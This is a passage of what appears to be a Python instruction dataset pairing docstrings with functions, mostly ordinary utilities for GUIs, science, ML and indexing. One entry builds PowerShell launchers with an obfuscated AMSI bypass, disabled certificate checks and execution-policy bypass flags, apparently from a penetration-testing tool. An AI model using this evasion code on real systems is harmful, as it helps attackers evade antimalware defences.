if script in self.elements_old:
new_script_dict.update({script: self.elements_old[script]})
elif script in self.elements_from_file:
new_script_dict.update({script: self.elements_from_file[script]})
new_script_parameter_dict = {}
for index, script in enumerate(new_script_list):
new_script_parameter_dict.update({script: index})
# QtGui.QTextEdit.toPlainText()
# get the module of the current dialogue
package = get_python_package(inspect.getmodule(self).__file__)
assert package is not None # check that we actually find a module
# class_name = Script.set_up_dynamic_script(factory_scripts, new_script_parameter_list, self.cmb_looping_variable.currentText() == 'Parameter Sweep')
new_script_dict = {name: {'class': 'ScriptIterator', 'package': package, 'scripts': new_script_dict,
'info': str(self.txt_info.toPlainText()),
'settings': {'script_order': new_script_parameter_dict,
'iterator_type': str(self.cmb_looping_variable.currentText())}}}
self.selected_element_name = name
self.fill_tree(self.tree_loaded, new_script_dict)
self.elements_from_file.update(new_script_dict) | creates a script sequence based on the script iterator type selected and the selected scripts and sends it to the tree
self.tree_loaded | Below is the the instruction that describes the task:
### Input:
creates a script sequence based on the script iterator type selected and the selected scripts and sends it to the tree
self.tree_loaded
### Response:
def add_script_sequence(self):
"""
creates a script sequence based on the script iterator type selected and the selected scripts and sends it to the tree
self.tree_loaded
"""
def empty_tree(tree_model):
# COMMENT_ME
def add_children_to_list(item, somelist):
if item.hasChildren():
for rownum in range(0, item.rowCount()):
somelist.append(str(item.child(rownum, 0).text()))
output_list = []
root = tree_model.invisibleRootItem()
add_children_to_list(root, output_list)
tree_model.clear()
return output_list
name = str(self.txt_script_sequence_name.text())
new_script_list = empty_tree(self.tree_script_sequence_model)
new_script_dict = {}
for script in new_script_list:
if script in self.elements_old:
new_script_dict.update({script: self.elements_old[script]})
elif script in self.elements_from_file:
new_script_dict.update({script: self.elements_from_file[script]})
new_script_parameter_dict = {}
for index, script in enumerate(new_script_list):
new_script_parameter_dict.update({script: index})
# QtGui.QTextEdit.toPlainText()
# get the module of the current dialogue
package = get_python_package(inspect.getmodule(self).__file__)
assert package is not None # check that we actually find a module
# class_name = Script.set_up_dynamic_script(factory_scripts, new_script_parameter_list, self.cmb_looping_variable.currentText() == 'Parameter Sweep')
new_script_dict = {name: {'class': 'ScriptIterator', 'package': package, 'scripts': new_script_dict,
'info': str(self.txt_info.toPlainText()),
'settings': {'script_order': new_script_parameter_dict,
'iterator_type': str(self.cmb_looping_variable.currentText())}}}
self.selected_element_name = name
self.fill_tree(self.tree_loaded, new_script_dict)
self.elements_from_file.update(new_script_dict) |
def est_gaba_conc(self):
"""
Estimate gaba concentration based on equation adapted from Sanacora
1999, p1045
Ref: Sanacora, G., Mason, G. F., Rothman, D. L., Behar, K. L., Hyder,
F., Petroff, O. A., ... & Krystal, J. H. (1999). Reduced cortical
$\gamma$-aminobutyric acid levels in depressed patients determined by
proton magnetic resonance spectroscopy. Archives of general psychiatry,
56(11), 1043.
"""
# need gaba_auc and creatine_auc
if not hasattr(self, 'gaba_params'):
self.fit_gaba()
# estimate [GABA] according to equation9
gaba_conc_est = self.gaba_auc / self.creatine_auc * 1.5 * 9.0
self.gaba_conc_est = gaba_conc_est | Estimate gaba concentration based on equation adapted from Sanacora
1999, p1045
Ref: Sanacora, G., Mason, G. F., Rothman, D. L., Behar, K. L., Hyder,
F., Petroff, O. A., ... & Krystal, J. H. (1999). Reduced cortical
$\gamma$-aminobutyric acid levels in depressed patients determined by
proton magnetic resonance spectroscopy. Archives of general psychiatry,
56(11), 1043. | Below is the the instruction that describes the task:
### Input:
Estimate gaba concentration based on equation adapted from Sanacora
1999, p1045
Ref: Sanacora, G., Mason, G. F., Rothman, D. L., Behar, K. L., Hyder,
F., Petroff, O. A., ... & Krystal, J. H. (1999). Reduced cortical
$\gamma$-aminobutyric acid levels in depressed patients determined by
proton magnetic resonance spectroscopy. Archives of general psychiatry,
56(11), 1043.
### Response:
def est_gaba_conc(self):
"""
Estimate gaba concentration based on equation adapted from Sanacora
1999, p1045
Ref: Sanacora, G., Mason, G. F., Rothman, D. L., Behar, K. L., Hyder,
F., Petroff, O. A., ... & Krystal, J. H. (1999). Reduced cortical
$\gamma$-aminobutyric acid levels in depressed patients determined by
proton magnetic resonance spectroscopy. Archives of general psychiatry,
56(11), 1043.
"""
# need gaba_auc and creatine_auc
if not hasattr(self, 'gaba_params'):
self.fit_gaba()
# estimate [GABA] according to equation9
gaba_conc_est = self.gaba_auc / self.creatine_auc * 1.5 * 9.0
self.gaba_conc_est = gaba_conc_est |
def checker(func: Callable) -> Callable:
"""
A decorator that will convert AssertionErrors into
CiVerificationError.
:param func: A function that will raise AssertionError
:return: The given function wrapped to raise a CiVerificationError on AssertionError
"""
def func_wrapper(*args, **kwargs):
try:
func(*args, **kwargs)
return True
except AssertionError:
raise CiVerificationError(
'The verification check for the environment did not pass.'
)
return func_wrapper | A decorator that will convert AssertionErrors into
CiVerificationError.
:param func: A function that will raise AssertionError
:return: The given function wrapped to raise a CiVerificationError on AssertionError | Below is the the instruction that describes the task:
### Input:
A decorator that will convert AssertionErrors into
CiVerificationError.
:param func: A function that will raise AssertionError
:return: The given function wrapped to raise a CiVerificationError on AssertionError
### Response:
def checker(func: Callable) -> Callable:
"""
A decorator that will convert AssertionErrors into
CiVerificationError.
:param func: A function that will raise AssertionError
:return: The given function wrapped to raise a CiVerificationError on AssertionError
"""
def func_wrapper(*args, **kwargs):
try:
func(*args, **kwargs)
return True
except AssertionError:
raise CiVerificationError(
'The verification check for the environment did not pass.'
)
return func_wrapper |
def sort_by_name(infile, outfile):
'''Sorts input sequence file by sort -d -k1,1, writes sorted output file.'''
seqs = {}
file_to_dict(infile, seqs)
#seqs = list(seqs.values())
#seqs.sort()
fout = utils.open_file_write(outfile)
for name in sorted(seqs):
print(seqs[name], file=fout)
utils.close(fout) | Sorts input sequence file by sort -d -k1,1, writes sorted output file. | Below is the the instruction that describes the task:
### Input:
Sorts input sequence file by sort -d -k1,1, writes sorted output file.
### Response:
def sort_by_name(infile, outfile):
'''Sorts input sequence file by sort -d -k1,1, writes sorted output file.'''
seqs = {}
file_to_dict(infile, seqs)
#seqs = list(seqs.values())
#seqs.sort()
fout = utils.open_file_write(outfile)
for name in sorted(seqs):
print(seqs[name], file=fout)
utils.close(fout) |
def handle_cable(cable, handler, standalone=True):
"""\
Emits event from the provided `cable` to the handler.
`cable`
A cable object.
`handler`
A ICableHandler instance.
`standalone`
Indicates if a `start` and `end` event should be
issued (default: ``True``).
If `standalone` is set to ``False``, no ``handler.start()``
and ``handler.end()`` event will be issued.
"""
def datetime(dt):
date, time = dt.split(u' ')
if len(time) == 5:
time += u':00'
time += u'Z'
return u'T'.join([date, time])
if standalone:
handler.start()
handler.start_cable(cable.reference_id, cable.canonical_id)
for iri in cable.wl_uris:
handler.handle_wikileaks_iri(iri)
handler.handle_creation_datetime(datetime(cable.created))
if cable.released:
handler.handle_release_date(cable.released[:10])
if cable.nondisclosure_deadline:
handler.handle_nondisclosure_deadline(cable.nondisclosure_deadline)
if cable.transmission_id:
handler.handle_transmission_id(cable.transmission_id)
if cable.subject:
handler.handle_subject(cable.subject)
if cable.summary:
handler.handle_summary(cable.summary)
if cable.comment:
handler.handle_comment(cable.comment)
handler.handle_header(cable.header)
handler.handle_content(cable.content)
handler.handle_origin(cable.origin)
handler.handle_classification(cable.classification)
handler.handle_partial(cable.partial)
for cat in cable.classification_categories:
handler.handle_classification_category(cat)
for classificationist in cable.classificationists:
handler.handle_classificationist(classificationist)
for signer in cable.signers:
handler.handle_signer(signer)
for tag in cable.tags:
handler.handle_tag(tag)
for iri in cable.media_uris:
handler.handle_media_iri(iri)
for rec in cable.recipients:
handler.handle_recipient(rec)
for rec in cable.info_recipients:
handler.handle_info_recipient(rec)
for ref in cable.references:
handler.handle_reference(ref)
handler.end_cable()
if standalone:
handler.end() | \
Emits event from the provided `cable` to the handler.
`cable`
A cable object.
`handler`
A ICableHandler instance.
`standalone`
Indicates if a `start` and `end` event should be
issued (default: ``True``).
If `standalone` is set to ``False``, no ``handler.start()``
and ``handler.end()`` event will be issued. | Below is the the instruction that describes the task:
### Input:
\
Emits event from the provided `cable` to the handler.
`cable`
A cable object.
`handler`
A ICableHandler instance.
`standalone`
Indicates if a `start` and `end` event should be
issued (default: ``True``).
If `standalone` is set to ``False``, no ``handler.start()``
and ``handler.end()`` event will be issued.
### Response:
def handle_cable(cable, handler, standalone=True):
"""\
Emits event from the provided `cable` to the handler.
`cable`
A cable object.
`handler`
A ICableHandler instance.
`standalone`
Indicates if a `start` and `end` event should be
issued (default: ``True``).
If `standalone` is set to ``False``, no ``handler.start()``
and ``handler.end()`` event will be issued.
"""
def datetime(dt):
date, time = dt.split(u' ')
if len(time) == 5:
time += u':00'
time += u'Z'
return u'T'.join([date, time])
if standalone:
handler.start()
handler.start_cable(cable.reference_id, cable.canonical_id)
for iri in cable.wl_uris:
handler.handle_wikileaks_iri(iri)
handler.handle_creation_datetime(datetime(cable.created))
if cable.released:
handler.handle_release_date(cable.released[:10])
if cable.nondisclosure_deadline:
handler.handle_nondisclosure_deadline(cable.nondisclosure_deadline)
if cable.transmission_id:
handler.handle_transmission_id(cable.transmission_id)
if cable.subject:
handler.handle_subject(cable.subject)
if cable.summary:
handler.handle_summary(cable.summary)
if cable.comment:
handler.handle_comment(cable.comment)
handler.handle_header(cable.header)
handler.handle_content(cable.content)
handler.handle_origin(cable.origin)
handler.handle_classification(cable.classification)
handler.handle_partial(cable.partial)
for cat in cable.classification_categories:
handler.handle_classification_category(cat)
for classificationist in cable.classificationists:
handler.handle_classificationist(classificationist)
for signer in cable.signers:
handler.handle_signer(signer)
for tag in cable.tags:
handler.handle_tag(tag)
for iri in cable.media_uris:
handler.handle_media_iri(iri)
for rec in cable.recipients:
handler.handle_recipient(rec)
for rec in cable.info_recipients:
handler.handle_info_recipient(rec)
for ref in cable.references:
handler.handle_reference(ref)
handler.end_cable()
if standalone:
handler.end() |
def create_network(batch_size, update_freq):
"""Create a linear regression network for performing SVRG optimization.
:return: an instance of mx.io.NDArrayIter
:return: an instance of mx.mod.svrgmodule for performing SVRG optimization
"""
head = '%(asctime)-15s %(message)s'
logging.basicConfig(level=logging.INFO, format=head)
data = np.random.randint(1, 5, [1000, 2])
#Test_Train data split
n_train = int(data.shape[0] * 0.8)
weights = np.array([1.0, 2.0])
label = data.dot(weights)
di = mx.io.NDArrayIter(data[:n_train, :], label[:n_train], batch_size=batch_size, shuffle=True, label_name='lin_reg_label')
val_iter = mx.io.NDArrayIter(data[n_train:, :], label[n_train:], batch_size=batch_size)
X = mx.sym.Variable('data')
Y = mx.symbol.Variable('lin_reg_label')
fully_connected_layer = mx.sym.FullyConnected(data=X, name='fc1', num_hidden=1)
lro = mx.sym.LinearRegressionOutput(data=fully_connected_layer, label=Y, name="lro")
mod = SVRGModule(
symbol=lro,
data_names=['data'],
label_names=['lin_reg_label'], update_freq=update_freq, logger=logging)
return di, val_iter, mod | Create a linear regression network for performing SVRG optimization.
:return: an instance of mx.io.NDArrayIter
:return: an instance of mx.mod.svrgmodule for performing SVRG optimization | Below is the the instruction that describes the task:
### Input:
Create a linear regression network for performing SVRG optimization.
:return: an instance of mx.io.NDArrayIter
:return: an instance of mx.mod.svrgmodule for performing SVRG optimization
### Response:
def create_network(batch_size, update_freq):
"""Create a linear regression network for performing SVRG optimization.
:return: an instance of mx.io.NDArrayIter
:return: an instance of mx.mod.svrgmodule for performing SVRG optimization
"""
head = '%(asctime)-15s %(message)s'
logging.basicConfig(level=logging.INFO, format=head)
data = np.random.randint(1, 5, [1000, 2])
#Test_Train data split
n_train = int(data.shape[0] * 0.8)
weights = np.array([1.0, 2.0])
label = data.dot(weights)
di = mx.io.NDArrayIter(data[:n_train, :], label[:n_train], batch_size=batch_size, shuffle=True, label_name='lin_reg_label')
val_iter = mx.io.NDArrayIter(data[n_train:, :], label[n_train:], batch_size=batch_size)
X = mx.sym.Variable('data')
Y = mx.symbol.Variable('lin_reg_label')
fully_connected_layer = mx.sym.FullyConnected(data=X, name='fc1', num_hidden=1)
lro = mx.sym.LinearRegressionOutput(data=fully_connected_layer, label=Y, name="lro")
mod = SVRGModule(
symbol=lro,
data_names=['data'],
label_names=['lin_reg_label'], update_freq=update_freq, logger=logging)
return di, val_iter, mod |
def _complete_task(self, task_name, **kwargs):
""" Marks this task as completed. Kwargs are stored in the run log. """
logger.debug('Job {0} marking task {1} as completed'.format(self.name, task_name))
self.run_log['tasks'][task_name] = kwargs
for node in self.downstream(task_name, self.snapshot):
self._start_if_ready(node)
try:
self.backend.acquire_lock()
self._commit_run_log()
except:
logger.exception("Error in handling events.")
finally:
self.backend.release_lock()
if kwargs.get('success', None) == False:
task = self.tasks[task_name]
try:
self.backend.acquire_lock()
if self.event_handler:
self.event_handler.emit('task_failed',
task._serialize(include_run_logs=True))
except:
logger.exception("Error in handling events.")
finally:
self.backend.release_lock()
self._on_completion() | Marks this task as completed. Kwargs are stored in the run log. | Below is the the instruction that describes the task:
### Input:
Marks this task as completed. Kwargs are stored in the run log.
### Response:
def _complete_task(self, task_name, **kwargs):
""" Marks this task as completed. Kwargs are stored in the run log. """
logger.debug('Job {0} marking task {1} as completed'.format(self.name, task_name))
self.run_log['tasks'][task_name] = kwargs
for node in self.downstream(task_name, self.snapshot):
self._start_if_ready(node)
try:
self.backend.acquire_lock()
self._commit_run_log()
except:
logger.exception("Error in handling events.")
finally:
self.backend.release_lock()
if kwargs.get('success', None) == False:
task = self.tasks[task_name]
try:
self.backend.acquire_lock()
if self.event_handler:
self.event_handler.emit('task_failed',
task._serialize(include_run_logs=True))
except:
logger.exception("Error in handling events.")
finally:
self.backend.release_lock()
self._on_completion() |
def create_ps_command(ps_command, force_ps32=False, dont_obfs=False):
amsi_bypass = """[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
try{
[Ref].Assembly.GetType('Sys'+'tem.Man'+'agement.Aut'+'omation.Am'+'siUt'+'ils').GetField('am'+'siIni'+'tFailed', 'NonP'+'ublic,Sta'+'tic').SetValue($null, $true)
}catch{}
"""
if force_ps32:
command = amsi_bypass + """
$functions = {{
function Command-ToExecute
{{
{command}
}}
}}
if ($Env:PROCESSOR_ARCHITECTURE -eq 'AMD64')
{{
$job = Start-Job -InitializationScript $functions -ScriptBlock {{Command-ToExecute}} -RunAs32
$job | Wait-Job
}}
else
{{
IEX "$functions"
Command-ToExecute
}}
""".format(command=amsi_bypass + ps_command)
else:
command = amsi_bypass + ps_command
logging.debug('Generated PS command:\n {}\n'.format(command))
# We could obfuscate the initial launcher using Invoke-Obfuscation but because this function gets executed concurrently
# it would spawn a local powershell process per host which isn't ideal, until I figure out a good way of dealing with this
# it will use the partial python implementation that I stole from GreatSCT (https://github.com/GreatSCT/GreatSCT) <3
"""
if is_powershell_installed():
temp = tempfile.NamedTemporaryFile(prefix='cme_',
suffix='.ps1',
dir='/tmp')
temp.write(command)
temp.read()
encoding_types = [1,2,3,4,5,6]
while True:
encoding = random.choice(encoding_types)
invoke_obfs_command = 'powershell -C \'Import-Module {};Invoke-Obfuscation -ScriptPath {} -Command "ENCODING,{}" -Quiet\''.format(get_ps_script('invoke-obfuscation/Invoke-Obfuscation.psd1'),
temp.name,
encoding)
logging.debug(invoke_obfs_command)
out = check_output(invoke_obfs_command, shell=True).split('\n')[4].strip()
command = 'powershell.exe -exec bypass -noni -nop -w 1 -C "{}"'.format(out)
logging.debug('Command length: {}'.format(len(command)))
if len(command) <= 8192:
temp.close()
break
encoding_types.remove(encoding)
else:
"""
if not dont_obfs:
obfs_attempts = 0
while True:
command = 'powershell.exe -exec bypass -noni -nop -w 1 -C "' + invoke_obfuscation(command) + '"'
if len(command) <= 8191:
break
if obfs_attempts == 4:
logger.error('Command exceeds maximum length of 8191 chars (was {}). exiting.'.format(len(command)))
exit(1)
obfs_attempts += 1
else:
command = 'powershell.exe -noni -nop -w 1 -enc {}'.format(encode_ps_command(command))
if len(command) > 8191:
logger.error('Command exceeds maximum length of 8191 chars (was {}). exiting.'.format(len(command)))
exit(1)
return command | if is_powershell_installed():
temp = tempfile.NamedTemporaryFile(prefix='cme_',
suffix='.ps1',
dir='/tmp')
temp.write(command)
temp.read()
encoding_types = [1,2,3,4,5,6]
while True:
encoding = random.choice(encoding_types)
invoke_obfs_command = 'powershell -C \'Import-Module {};Invoke-Obfuscation -ScriptPath {} -Command "ENCODING,{}" -Quiet\''.format(get_ps_script('invoke-obfuscation/Invoke-Obfuscation.psd1'),
temp.name,
encoding)
logging.debug(invoke_obfs_command)
out = check_output(invoke_obfs_command, shell=True).split('\n')[4].strip()
command = 'powershell.exe -exec bypass -noni -nop -w 1 -C "{}"'.format(out)
logging.debug('Command length: {}'.format(len(command)))
if len(command) <= 8192:
temp.close()
break
encoding_types.remove(encoding)
else: | Below is the the instruction that describes the task:
### Input:
if is_powershell_installed():
temp = tempfile.NamedTemporaryFile(prefix='cme_',
suffix='.ps1',
dir='/tmp')
temp.write(command)
temp.read()
encoding_types = [1,2,3,4,5,6]
while True:
encoding = random.choice(encoding_types)
invoke_obfs_command = 'powershell -C \'Import-Module {};Invoke-Obfuscation -ScriptPath {} -Command "ENCODING,{}" -Quiet\''.format(get_ps_script('invoke-obfuscation/Invoke-Obfuscation.psd1'),
temp.name,
encoding)
logging.debug(invoke_obfs_command)
out = check_output(invoke_obfs_command, shell=True).split('\n')[4].strip()
command = 'powershell.exe -exec bypass -noni -nop -w 1 -C "{}"'.format(out)
logging.debug('Command length: {}'.format(len(command)))
if len(command) <= 8192:
temp.close()
break
encoding_types.remove(encoding)
else:
### Response:
def create_ps_command(ps_command, force_ps32=False, dont_obfs=False):
amsi_bypass = """[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
try{
[Ref].Assembly.GetType('Sys'+'tem.Man'+'agement.Aut'+'omation.Am'+'siUt'+'ils').GetField('am'+'siIni'+'tFailed', 'NonP'+'ublic,Sta'+'tic').SetValue($null, $true)
}catch{}
"""
if force_ps32:
command = amsi_bypass + """
$functions = {{
function Command-ToExecute
{{
{command}
}}
}}
if ($Env:PROCESSOR_ARCHITECTURE -eq 'AMD64')
{{
$job = Start-Job -InitializationScript $functions -ScriptBlock {{Command-ToExecute}} -RunAs32
$job | Wait-Job
}}
else
{{
IEX "$functions"
Command-ToExecute
}}
""".format(command=amsi_bypass + ps_command)
else:
command = amsi_bypass + ps_command
logging.debug('Generated PS command:\n {}\n'.format(command))
# We could obfuscate the initial launcher using Invoke-Obfuscation but because this function gets executed concurrently
# it would spawn a local powershell process per host which isn't ideal, until I figure out a good way of dealing with this
# it will use the partial python implementation that I stole from GreatSCT (https://github.com/GreatSCT/GreatSCT) <3
"""
if is_powershell_installed():
temp = tempfile.NamedTemporaryFile(prefix='cme_',
suffix='.ps1',
dir='/tmp')
temp.write(command)
temp.read()
encoding_types = [1,2,3,4,5,6]
while True:
encoding = random.choice(encoding_types)
invoke_obfs_command = 'powershell -C \'Import-Module {};Invoke-Obfuscation -ScriptPath {} -Command "ENCODING,{}" -Quiet\''.format(get_ps_script('invoke-obfuscation/Invoke-Obfuscation.psd1'),
temp.name,
encoding)
logging.debug(invoke_obfs_command)
out = check_output(invoke_obfs_command, shell=True).split('\n')[4].strip()
command = 'powershell.exe -exec bypass -noni -nop -w 1 -C "{}"'.format(out)
logging.debug('Command length: {}'.format(len(command)))
if len(command) <= 8192:
temp.close()
break
encoding_types.remove(encoding)
else:
"""
if not dont_obfs:
obfs_attempts = 0
while True:
command = 'powershell.exe -exec bypass -noni -nop -w 1 -C "' + invoke_obfuscation(command) + '"'
if len(command) <= 8191:
break
if obfs_attempts == 4:
logger.error('Command exceeds maximum length of 8191 chars (was {}). exiting.'.format(len(command)))
exit(1)
obfs_attempts += 1
else:
command = 'powershell.exe -noni -nop -w 1 -enc {}'.format(encode_ps_command(command))
if len(command) > 8191:
logger.error('Command exceeds maximum length of 8191 chars (was {}). exiting.'.format(len(command)))
exit(1)
return command |
def run(generate_pks, show_pks, host, port, uri):
"""Connect sandman to <URI> and start the API server/admin
interface."""
app.config['SQLALCHEMY_DATABASE_URI'] = uri
app.config['SANDMAN_GENERATE_PKS'] = generate_pks
app.config['SANDMAN_SHOW_PKS'] = show_pks
app.config['SERVER_HOST'] = host
app.config['SERVER_PORT'] = port
activate(name='sandmanctl')
app.run(host=host, port=int(port), debug=True) | Connect sandman to <URI> and start the API server/admin
interface. | Below is the the instruction that describes the task:
### Input:
Connect sandman to <URI> and start the API server/admin
interface.
### Response:
def run(generate_pks, show_pks, host, port, uri):
"""Connect sandman to <URI> and start the API server/admin
interface."""
app.config['SQLALCHEMY_DATABASE_URI'] = uri
app.config['SANDMAN_GENERATE_PKS'] = generate_pks
app.config['SANDMAN_SHOW_PKS'] = show_pks
app.config['SERVER_HOST'] = host
app.config['SERVER_PORT'] = port
activate(name='sandmanctl')
app.run(host=host, port=int(port), debug=True) |
def add_to_filemenu():
"""Add Pyblish to file-menu
.. note:: We're going a bit hacky here, probably due to my lack
of understanding for `evalDeferred` or `executeDeferred`,
so if you can think of a better solution, feel free to edit.
"""
if hasattr(cmds, 'about') and not cmds.about(batch=True):
# As Maya builds its menus dynamically upon being accessed,
# we force its build here prior to adding our entry using it's
# native mel function call.
mel.eval("evalDeferred buildFileMenu")
# Serialise function into string
script = inspect.getsource(_add_to_filemenu)
script += "\n_add_to_filemenu()"
# If cmds doesn't have any members, we're most likely in an
# uninitialized batch-mode. It it does exists, ensure we
# really aren't in batch mode.
cmds.evalDeferred(script) | Add Pyblish to file-menu
.. note:: We're going a bit hacky here, probably due to my lack
of understanding for `evalDeferred` or `executeDeferred`,
so if you can think of a better solution, feel free to edit. | Below is the the instruction that describes the task:
### Input:
Add Pyblish to file-menu
.. note:: We're going a bit hacky here, probably due to my lack
of understanding for `evalDeferred` or `executeDeferred`,
so if you can think of a better solution, feel free to edit.
### Response:
def add_to_filemenu():
"""Add Pyblish to file-menu
.. note:: We're going a bit hacky here, probably due to my lack
of understanding for `evalDeferred` or `executeDeferred`,
so if you can think of a better solution, feel free to edit.
"""
if hasattr(cmds, 'about') and not cmds.about(batch=True):
# As Maya builds its menus dynamically upon being accessed,
# we force its build here prior to adding our entry using it's
# native mel function call.
mel.eval("evalDeferred buildFileMenu")
# Serialise function into string
script = inspect.getsource(_add_to_filemenu)
script += "\n_add_to_filemenu()"
# If cmds doesn't have any members, we're most likely in an
# uninitialized batch-mode. It it does exists, ensure we
# really aren't in batch mode.
cmds.evalDeferred(script) |
def _run_server(self, multiprocessing):
"""Use server multiprocessing to extract PCAP files."""
if not self._flag_m:
raise UnsupportedCall(f"Extractor(engine={self._exeng})' has no attribute '_run_server'")
if not self._flag_q:
self._flag_q = True
warnings.warn("'Extractor(engine=pipeline)' does not support output; "
f"'fout={self._ofnm}' ignored", AttributeWarning, stacklevel=stacklevel())
self._frnum = 1 # frame number (revised)
self._expkg = multiprocessing # multiprocessing module
self._mpsvc = NotImplemented # multiprocessing server process
self._mpprc = list() # multiprocessing process list
self._mpfdp = collections.defaultdict(multiprocessing.Queue) # multiprocessing file pointer
self._mpmng = multiprocessing.Manager() # multiprocessing manager
self._mpbuf = self._mpmng.dict() # multiprocessing frame dict
self._mpfrm = self._mpmng.list() # multiprocessing frame storage
self._mprsm = self._mpmng.list() # multiprocessing reassembly buffer
self._mpkit = self._mpmng.Namespace() # multiprocessing work kit
self._mpkit.counter = 0 # work count (on duty)
self._mpkit.pool = 1 # work pool (ready)
self._mpkit.eof = False # EOF flag
self._mpkit.trace = None # flow tracer
# preparation
self.record_header()
self._mpfdp[0].put(self._gbhdr.length)
self._mpsvc = multiprocessing.Process(
target=self._server_analyse_frame,
kwargs={'mpfrm': self._mpfrm, 'mprsm': self._mprsm, 'mpbuf': self._mpbuf, 'mpkit': self._mpkit}
)
self._mpsvc.start()
# extraction
while True:
# check EOF
if self._mpkit.eof:
self._update_eof()
break
# check counter
if self._mpkit.pool and self._mpkit.counter < CPU_CNT - 1:
# update file offset
self._ifile.seek(self._mpfdp.pop(self._frnum-1).get(), os.SEEK_SET)
# create worker
# print(self._frnum, 'start')
proc = multiprocessing.Process(
target=self._server_extract_frame,
kwargs={'mpkit': self._mpkit, 'mpbuf': self._mpbuf, 'mpfdp': self._mpfdp[self._frnum]}
)
# update status
self._mpkit.pool -= 1
self._mpkit.counter += 1
# start and record
proc.start()
self._frnum += 1
self._mpprc.append(proc)
# check buffer
if len(self._mpprc) >= CPU_CNT - 1:
[proc.join() for proc in self._mpprc[:-4]]
del self._mpprc[:-4] | Use server multiprocessing to extract PCAP files. | Below is the the instruction that describes the task:
### Input:
Use server multiprocessing to extract PCAP files.
### Response:
def _run_server(self, multiprocessing):
"""Use server multiprocessing to extract PCAP files."""
if not self._flag_m:
raise UnsupportedCall(f"Extractor(engine={self._exeng})' has no attribute '_run_server'")
if not self._flag_q:
self._flag_q = True
warnings.warn("'Extractor(engine=pipeline)' does not support output; "
f"'fout={self._ofnm}' ignored", AttributeWarning, stacklevel=stacklevel())
self._frnum = 1 # frame number (revised)
self._expkg = multiprocessing # multiprocessing module
self._mpsvc = NotImplemented # multiprocessing server process
self._mpprc = list() # multiprocessing process list
self._mpfdp = collections.defaultdict(multiprocessing.Queue) # multiprocessing file pointer
self._mpmng = multiprocessing.Manager() # multiprocessing manager
self._mpbuf = self._mpmng.dict() # multiprocessing frame dict
self._mpfrm = self._mpmng.list() # multiprocessing frame storage
self._mprsm = self._mpmng.list() # multiprocessing reassembly buffer
self._mpkit = self._mpmng.Namespace() # multiprocessing work kit
self._mpkit.counter = 0 # work count (on duty)
self._mpkit.pool = 1 # work pool (ready)
self._mpkit.eof = False # EOF flag
self._mpkit.trace = None # flow tracer
# preparation
self.record_header()
self._mpfdp[0].put(self._gbhdr.length)
self._mpsvc = multiprocessing.Process(
target=self._server_analyse_frame,
kwargs={'mpfrm': self._mpfrm, 'mprsm': self._mprsm, 'mpbuf': self._mpbuf, 'mpkit': self._mpkit}
)
self._mpsvc.start()
# extraction
while True:
# check EOF
if self._mpkit.eof:
self._update_eof()
break
# check counter
if self._mpkit.pool and self._mpkit.counter < CPU_CNT - 1:
# update file offset
self._ifile.seek(self._mpfdp.pop(self._frnum-1).get(), os.SEEK_SET)
# create worker
# print(self._frnum, 'start')
proc = multiprocessing.Process(
target=self._server_extract_frame,
kwargs={'mpkit': self._mpkit, 'mpbuf': self._mpbuf, 'mpfdp': self._mpfdp[self._frnum]}
)
# update status
self._mpkit.pool -= 1
self._mpkit.counter += 1
# start and record
proc.start()
self._frnum += 1
self._mpprc.append(proc)
# check buffer
if len(self._mpprc) >= CPU_CNT - 1:
[proc.join() for proc in self._mpprc[:-4]]
del self._mpprc[:-4] |
def _should_really_index(self, instance):
"""Return True if according to should_index the object should be indexed."""
if self._should_index_is_method:
is_method = inspect.ismethod(self.should_index)
try:
count_args = len(inspect.signature(self.should_index).parameters)
except AttributeError:
# noinspection PyDeprecation
count_args = len(inspect.getargspec(self.should_index).args)
if is_method or count_args is 1:
# bound method, call with instance
return self.should_index(instance)
else:
# unbound method, simply call without arguments
return self.should_index()
else:
# property/attribute/Field, evaluate as bool
attr_type = type(self.should_index)
if attr_type is DeferredAttribute:
attr_value = self.should_index.__get__(instance, None)
elif attr_type is str:
attr_value = getattr(instance, self.should_index)
elif attr_type is property:
attr_value = self.should_index.__get__(instance)
else:
raise AlgoliaIndexError('{} should be a boolean attribute or a method that returns a boolean.'.format(
self.should_index))
if type(attr_value) is not bool:
raise AlgoliaIndexError("%s's should_index (%s) should be a boolean" % (
instance.__class__.__name__, self.should_index))
return attr_value | Return True if according to should_index the object should be indexed. | Below is the the instruction that describes the task:
### Input:
Return True if according to should_index the object should be indexed.
### Response:
def _should_really_index(self, instance):
"""Return True if according to should_index the object should be indexed."""
if self._should_index_is_method:
is_method = inspect.ismethod(self.should_index)
try:
count_args = len(inspect.signature(self.should_index).parameters)
except AttributeError:
# noinspection PyDeprecation
count_args = len(inspect.getargspec(self.should_index).args)
if is_method or count_args is 1:
# bound method, call with instance
return self.should_index(instance)
else:
# unbound method, simply call without arguments
return self.should_index()
else:
# property/attribute/Field, evaluate as bool
attr_type = type(self.should_index)
if attr_type is DeferredAttribute:
attr_value = self.should_index.__get__(instance, None)
elif attr_type is str:
attr_value = getattr(instance, self.should_index)
elif attr_type is property:
attr_value = self.should_index.__get__(instance)
else:
raise AlgoliaIndexError('{} should be a boolean attribute or a method that returns a boolean.'.format(
self.should_index))
if type(attr_value) is not bool:
raise AlgoliaIndexError("%s's should_index (%s) should be a boolean" % (
instance.__class__.__name__, self.should_index))
return attr_value |
def fit_lines(self, window=1500, break_thresh=1500):
"""
Fits lines to pitch contours.
:param window: size of each chunk to which linear equation is to be fit (in milliseconds).
To keep it simple, hop is chosen to be one third of the window.
:param break_thresh: If there is silence beyond this limit (in milliseconds),
the contour will be broken there into two so that we don't fit a line over and
including the silent region.
"""
window /= 1000
hop = window/3
break_thresh /= 1000
#cut the whole song into pieces if there are gaps more than break_thresh seconds
i = 0
break_indices = []
count = 0
while i < len(self.pitch):
if self.pitch[i] == -10000:
count = 1
start_index = i
while i < len(self.pitch) and self.pitch[i] == -10000:
count += 1
i += 1
end_index = i-1
if self.timestamps[end_index]-self.timestamps[start_index] >= break_thresh:
break_indices.append([start_index, end_index])
i += 1
break_indices = np.array(break_indices)
#In creating the data blocks which are not silences, note that we
# take complimentary break indices. i.e., if [[s1, e1], [s2, e2] ...]
# is break_indices, we take e1-s2, e2-s3 chunks and build data blocks
data_blocks = []
if len(break_indices) == 0:
t_pitch = self.pitch.reshape(len(self.pitch), 1)
t_timestamps = self.timestamps.reshape(len(self.timestamps), 1)
data_blocks = [np.append(t_timestamps, t_pitch, axis=1)]
else:
if break_indices[0, 0] != 0:
